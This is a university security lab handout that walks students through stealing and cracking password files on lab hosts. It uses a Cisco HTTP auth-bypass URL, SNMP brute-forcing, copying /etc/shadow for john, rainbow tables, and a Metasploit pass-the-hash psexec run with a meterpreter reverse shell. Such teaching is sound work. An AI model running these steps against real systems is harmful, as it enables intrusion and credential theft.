CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #1

Password Cracking Lab

Lab Overview The objective of this lab is to introduce you to grabbing and cracking password files from different OS’. You will be grabbing the files from a Windows 2000 host, a Redhad host, a Macintosh OS X.7 host, and from a Cisco router. To obtain these files, we will use different methods of attack last lab’s Alchemy Remote Executor to a simple ssh connections to known exploits within given operating systems. For this lab, it will be assumed you have already scanned and enumerated the network, and have decided to exploit the following four hosts for their password files:

OS IP Address Cisco OS v12.0 10.10.10.2 Windows 2000 10.10.10.20

10.10.10.53 Redhat Fedora Core 9 10.10.10.9 Macintosh OS X.2 10.10.10.107

10.10.10.110 Note that the lines in yellow are questions to answer in the write-up… Remote Connection See the previous lab (01A-NPS00 Introduction to the Lab) and log onto your remote host. Lab Procedures: Cisco IOS v12.0 on 10.10.10.2: Lets start with the Cisco router, because if we get the enable password, it may also be the administrator password on other systems. To get the password file from the Cisco router, we will use the old CISCO HTTP Configuration Arbitrary Administrative Access Vulnerability Exploit to copy the config file to our local Windows box, then download the cracking program Cain & Abel to crack its MD5 hash for us. Steps:

1. Log into the remote Windows VM. 2. Fire up the web browser and point it to the vulnerable router:

10.10.10.2 by, entering the following URL into the address bar. http://10.10.10.2/level/99/exec/show/config

and hit enter… You should now be presented with the startup configuration of the device (slightly different then the picture to the right…).

If this fails, go to the next section on SNMP

Page # 2

This was a very scary vulnerability discovered a few years ago and was viable against Cisco Routers up to Ver 12.0 (and trust me, very few people update their Cisco routers very often; it is not like Windows or Mac as there is not update client or notification of updates, you have to go purchase them from Cisco!) If a Cisco router had Version 12 or older and had its web server enabled for remote administration and configuration, it was vulnerable to this attack! As near as I can tell, this is an example of a programmer at Cisco installing a back door to bypass authentication requirements for ease of his/her use (I say this as there are only 15 levels of rights in a router, so using level 99 was not a normal command). Also know that you could run ANY config (or other Cisco) command on the router with this, not just show run. Lets also grab the config file via another potential vulnerability in Cisco routers via SNMP (Simple Network Management Protocol). If SNMP is on, there is the possibility to reading the config file, with just read permission. You will use the nmap scripting engine (NSE) and one of it’s scripts to do this with. But before we can do even that, we need to find the community string (password) for the SNMP instance on the router. To do that we will also use the NSE but with an online password cracker scritp.

3. On your Kali host, perform the online password attack with the following script (note it will be using it’s default password list, which should work just fine). nmap –sU -p 161 --script=snmp-brute 10.10.10.2 {the –sU is for UDP, -p for port}

Note the Valid credentials community string for the next step (and yes, it’s the default community string of public!)

4. Now to get the config file! Use the following command NSE script: (NOTE this is all one continuous command, just keep typing till done)

nmap -sU -p 161 --script=snmp-ios-config --script-args snmpcommunitystring=public 10.10.10.2 -oN config

{-oN is the output file in normal (nmap) format} This should put a file in your directory called config ls it to confirm it’s there.

5. Now ensure your windows solarwinds tftp server is running (see previous lab on how to do this) and tftp it to your windows host. Use the following TWO commands tftp your_Windows_IP_address put config

CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #3

6. Back on your windows host ftp to ftp://ftpv8.hackers.net and get Cain & Abel at /CEHv8/Module 05 System Hacking/Password Cracking Tools/Cain & Able/ca_setup.exe.

7. Install Cain & Abel from the above file as administrator (.\admin). a. Be sure to install WinCap as well (it will prompt you to do so after installing

Cain & Abel) If it tells you there is an older version already installed, accept the defaults to install this newer version.

b. Do NOT reboot if prompted to do so… 8. Start Cain with Admin (run as…) If it warns you the firewall is on, just click through it. 9. Once it starts, it will look like this:

10. There are two types of passwords in the config file:

Type 5 (MD5 Hash)… More Secure Type 7 (XOR Hash)… Less Secure

11. You will now need to copy your encrypted passwords from the config web page or config.nmap file into Cain. Lets start with the easier Type 7 ones. There is a special cracker for these in Cain, under the top row icons.

a. Copy a Type 7 hash from the displayed config file into this tool (Be sure to copy just the hash!).

b. Copy these passwords down for the lab write-up!

Page # 4

12. Now lets do the more advanced MD5 hash password. For this one we will use a “Dictionary Attack” where we will hash every word in a dictionary or word list and compare the results with the hash from the config file (of course we won’t do this manually, we will let Cain do it for us ;-)

a. Click on Cain’s “Cracker” tab, and then the Cisco IOS-MD5 Hash cracker:

b. Now right-click Under the Hash pane, and choose to Add to List and paste in the

MD5 hash from the displayed config file in the web browser

c. Now right-click on that has and choose Dictionary Attack

d. We now need to add in the dictionary that will be

used. You could import one but lets use the word list that comes with Cain. Right-click in the Dictionary pane and choose to Add to list

e. In the Cain folder, you will find a folder called Wordlists. Navigate into that folder and choose Wordlist.

f. To save us time, I am going to have you limit the

options to just lower case passwords… This is just because I know the password is lower case (I know because I choose the password ;-). Normally you might choose more options that would more realistically test your possible password hashes…

g. Press the Start button and watch it do its thing! h. If it gets into the “c” words, something went wrong

(the password starts with “b”). My tests took less then a minute to run.

CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #5

i. When it completes its run, it shows the password in this window pane and if you close it, it also displays in the Hash pane…

j. Copy this password down for the lab write-up!

Page # 6

RedHat (10.10.10.9): To get the password file for this host, we will ssh to it, using the root account. Since we have a user account/password combination from the Cisco Router, that we discovered earlier in the lab, we will try that as the root password. We will need to log on as root on the targeted Linux since only root (or a service or process running as root) has the privilege to see the shadow file. We will read the passwd and shadow files, copying them to a local text file, save them, and run john against them once we have unshadowed them (combined them into one file for john to crack)… Steps:

1. ssh or VNC onto your Kali VM image, being sure to be running on a command line as root before continuing (you should be able to do this at this point in the quarter)

2. From within that command line within Kali we are going to copy the passwd and shadow file off of novalis-fc9.target.com (10.10.10.9) for cracking.

a. cd into the pwd2crack directory you just made. b. man scp to read what it does (q to exit) c. scp root@10.10.10.9:/etc/passwd .

{NOTE: there is no spaces between 9: and /etc, and there is a space between the passwd and the “.” [that period tells scp to put the file in you pwd]}

i. accept any keys it may offer (only happens to the first one to do this) ii. use the Type 5 password from Cain you cracked earlier.

d. scp root@10.10.10.9:/etc/shadow . e. Cat both files to be sure they arrived without any

problems. 3. Now combine the files with john and crack them from within the command line you are

on: a. unshadow passwd shadow > hashfile b. cat hashfile to ensure it worked (it should be one file

with the last few accounts having hashes in them)

c. john hashfile

To get status of where john is in cracking, hit the space bar…

4. Within 5 minutes, you should have the password and (account) for the ones john will crack quickly (should have cracked Bane, switch and smith’s account, along with some of the easier ones with passwords like Password1 and test)… Use <cntrl-c> to break out of john.

5. Run a quick john hashfile --show to see the accts and passwords that john cracked. Write down the passwords and accounts for the lab write-up. {Note we could let this run for weeks, but since we have what we need for now we ended it and move on… <cntrl>-c to end}

a. john hashfile --show b. Note that this one is in the format of

useracct:passwd:uid:groupid:longname:homedir:shell_pref

CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #7

Windows 2000 (gnosis-win2000.target.com): We have the password SAM file from this windows host from our previous lab where we ran Alchemy Remote Executor with admin privileges to obtain the SAM file with pwdump3. Now we have to crack it. We could use john like we did with the previous linux box, but lets try a new tool (see the lab manual Lab 05-01 LCP for additional information). Once we see how LCP runs, I will then have you transfer your SAM file over to another host running rainbow tables so we can crack all the accounts quickly (less then 5 minutes to crack ALL the LANMAN hashes!) Steps:

1. In your remote Windows 7 host, open a Command Shell (DOS Prompt) and change directory to your desktop (or a lab folder if you are using them)

2. ftp to ftp://ftpv8.hackers.net and get LCP from /CEHv8/CEHv8 Module 5 System Hacking/ Password Cracking Tools/ LCP lcp504en.exe.

3. Now unzip it and install it with “run as” Administrator. 4. Once installed, start LCP5 up (manually find it under C:\Program Files (x86)\LCP), run

as administrator.

5. You will need to import the pwdump file from the last lab to crack it.

Ensure to have it look for all files to find yours (it should be in your D:\tftp-root\ folder:

6. Let it run (by clicking the play button) for about 2 minutes or until it goes into “Brute Force” mode, as you will have cracked all you can for now. You should have 6 passwords (for apoc, Dozwer, Morpheus, mouse, sati, tank) Write these down for the lab write-up.

Page # 8

Rainbow Tables You will now ssh onto a host that has rainbow tables on it and crack all the LANMAN hashes with the rainbow tables.

7. We will need to find a way to get our sam file to the host that has the rainbow tables for

cracking, so now is a good time to start your tftp server (Solarwinds) and ensure your pwdump file is in it (D:\tftp-root\ folder for transfer if it is not already there) (see previous labs if you don’t remember how to use tftp). So you will need to:

a. Start solarwinds tftp server, ensure the configuration is correct TFTP Root Directory set to D:\tftp-root\ and security set to transmit and receive)

b. From within your Kali host, open a shell and ssh over to rainbow.hackers.net ssh root@rainbow.hackers.net (accept any keys it offers, password Password1)

c. Once there, cd to the /rainbow/lm_full/ d. tftp your pwdump file to this directory (use tftp and get, see previous labs if you

don’t remember how) be sure to get the original file, NOT the one that ends in lcp (may be there from the LCP5 crack we just did ;-) tftp your_ip_address –c get filename

e. to see the commands for the crack program, run ./rcrack ./rcrack

f. now run ./rcrack on your file ./rcrack *.rt -f <your sam file> {May appear to hang for the first 5 mins, LET IT RUN (move onto the mac section below)! Should take less then 10 mins to run entire file, mine took a little over 6 mins to complete) (you may want to have the output go to a file by using >> outputfilename at the end of the previous command and then tftp it back to your host)

g. Write these cracked passwords down for the lab write-up ** NOTES: 1) As this is being run on a vm, be patient!! If more then one team is cracking at the same time, speed and execution time may vary. 2) When it's complete, the end of the run shows the list of hashes and the users/passwords 3) If you exit out of the ssh session (from your Kali host to the rainbow.hackers.net) while it is still running, it will kill the job. BUT if you remain logged in to your Kali host (and therefore the rainbow.hackers.net host), but DISCONNECT from either the VNC connection (if you got onto the Kali host that way) or the View session, (just quit your RDP/PCOIP session), it should continue to run in the background until you return and log back into csview.nps.edu and/or your Kali remote host via VNC from within your remote Windows 7 host.

CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #9

Pass-the-Hash & Windows Server 2003 10.10.10.53 You will now take the hash file and tftp it onto your kali host and look for the account Hamann. Looking at this file (use more or less) you should note that account Hamann has no LanMan hash but does have an NTLM hash (meaning we cannot crack his password with the rainbow table, but we can use the hash in another way). You will copy his NTLM hash and use metasploit’s pass-the-hash ability to use that hash of the password instead of the password itself to log onto a computer Hamann has an account on. 8. From within Kali, open a terminal/shell and just like in the previous step grab a copy of

the SAM file. tftp your_ip_address get SAMfilename

9. Look at the contents of the SAM file to be sure everything is there

10. You need the one account that doesn’t have a LanMan hash but does have an NTLM hash (hint: it’s Hamann)

11. We have been told that Councilor Hamann has access to a shared folder only he can access! It’s Keys2Mainframe on 10.10.10.53. Since we cannot just map a drive for him (we don’t have his password), we will have to use metasploit’s ability to pass-the-hash! Start metasploit and enter in the following settings:

a. msfconsole b. use exploit/windows/smb/psexec c. set RHOST 10.10.10.53 d. set SHARE Keys2Mainframe e. set SMBUser Hamann f. set SMBPass type-in-32-zeros-then-paste-in-Hamann’s-hash g. set PAYLOAD windows/meterpreter/reverse_tcp h. set LHOST your-IP-address

SEE SCREEN CAPTURE NEXT PAGE to confirm your settings

Page # 10

12. show options should look something like this:

13. Now run it with exploit and it should give you a meterpreter prompt!

14. Here we can get a shell and go look for the keys! Include the keys in your write-up! {Note: I was able to pass-the-hash to Windows XP, 7, 8 and 2008 Svr with success on the hash but the payload fails L}

Your IP should be different

Notice we have authenticated with the HASH, not the passwpord!

CS3695/M6-109 Lab 05-NPS03 Password Cracking Ver. 8 Rev.8

Page #11

Mac OS X.7 10.10.10.107: To get the password file for this host, we will ssh to it, using the one of the accounts discovered from the Windows box above (admin/Password1). Here the account will not be root, but an administrator on the Mac. Then we will run a program I loaded to it called Dave to crack one of them on the mac (Neo’s password on this host). This will, like most of the other cracks in this lab, be a dictionary attack against the hash. Steps using Dave:

1. ssh to 10.10.10.107 from within the Kali remote host. ssh admin@10.10.10.107 {note may take a few seconds to connect}

a. Accept any keys it may offer (only happens to the first one to do this) b. Use the password from the Windows password crack for admin from the

rainbow tables in the last step (Password1). 2. Dave can only crack or dump one user at a time so you will need to find the user names

on the Mac. To do this I recommend just looking in the /Users/ folder (each user is given their own home directory ;-) You could do this with more complicated commands like dscl, but for now this is a fine method ls /Users/

a. Now write down the accounts on this mac for the lab write-up. 3. cd into the /Users/Admin/Downloads/DavidGrohl/ 4. Lets run dave against the neo account.

sudo ./dave –u neo {Supply admin’s password (Password1) when prompted for it} {This should crack in about 30 seconds}

a. Now write down the password for the lab write-up. 5. Exit out of the ssh session

exit

Page # 12

Mac OS X.2 10.10.10.110: To get the password file for this host, we will ssh to it, using the one of the accounts discovered from the Windows box above (sati). Here the account will not be root; on the Mac, version 10.2 and 10.3 upgrade, there is a vulnerability that any user can still see the password file with the hashes using the nidump command. Then we will copy that file to a local text file, save it, and run john against it (we will not have to unshadow this file since the accounts and hashes are already combined by nidump) … Steps:

6. ssh to 10.10.10.110 from within the kali remote host. ssh sati@10.10.10.110 {note may take a few seconds to connect}

c. Accept any keys it may offer (only happens to the first one to do this) d. Use the password from the Windows password crack from the rainbow tables in

the last step. 7. View and copy the password file (this one has both the user and the password hashes)

nidump passwd / a. Now select the contents of the file by highlighting them in the shell and copying

them (be sure to only get the contents, not any of the command prompt lines) b. Open the text editor on your kali host (Top left corner of the kali screen:

Applications menu->Accessories->leafpad Text Editor) and paste the contents into it, then save the file as macpasswd.

8. Exit out of your ssh session with the remote host 10.10.10.110 exit

9. Now from within a root kali shell, cd into the directory of where you saved the above file.

10. Now run john against the macpasswd file. john macpasswd

11. Within a minute, you will have the password and (accounts) for the ones john will crack fairly quickly (should have cracked 5 of the 6 right off the bat), if you let it run for about 5 minutes it will find the last one for sati.

12. Stop the john run with a cntrl-c if you don’t want to wait the 5 minutes. 13. You can also see them by using the john’s show command once john has ended…

john --show macpasswd a. Note that this one is in the format of

useracct:passwd:uid:groupid:longname:homedir:shell_pref b. Now write down the password for the lab write-up.

Clean up Exit out of all your ssh sessions, close all windows, and disconnect I hope you enjoyed this lab… Feel free to let me know how to improve it in the write up Please post just showing the IP addresses, user accounts and some of the passwords you crack (you do NOT have to crack all of them) via Sakai Assignments page!